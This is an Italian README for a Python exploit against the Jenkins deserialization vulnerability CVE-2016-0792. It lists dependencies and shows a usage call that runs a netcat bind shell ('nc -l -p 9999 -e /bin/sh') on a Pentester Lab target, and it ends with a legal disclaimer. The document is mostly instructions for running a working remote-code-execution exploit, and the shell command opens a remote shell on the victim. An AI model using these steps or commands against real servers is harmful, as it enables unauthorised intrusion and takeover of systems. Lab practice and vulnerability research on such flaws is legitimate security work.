
Exploit per vulnerabilità di serializzazione di Jenkins - CVE-2016-0792
https://www.exploit-db.com/exploits/42394/
Python 3.6.x
La libreria requests è necessaria per far funzionare questo exploit
sudo pip install requests
python3
from exploit import exploit
exploit(url, command)
Dove url è l'URL del server Jenkins e command è il comando da eseguire
exploit('http://192.168.56.101/jenkins/', '/usr/bin/nc -l -p 9999 -e /bin/sh')
Questo avvierà nc e resterà in ascolto sulla porta 9999 sulla macchina vulnerabile
A scopo dimostrativo utilizzerò l'ISO di Pentester Lab
Utilizzare questo software per attaccare bersagli senza autorizzazione è illegale. Non sono responsabile per eventuali danni causati dall'uso di questo software in violazione della legge.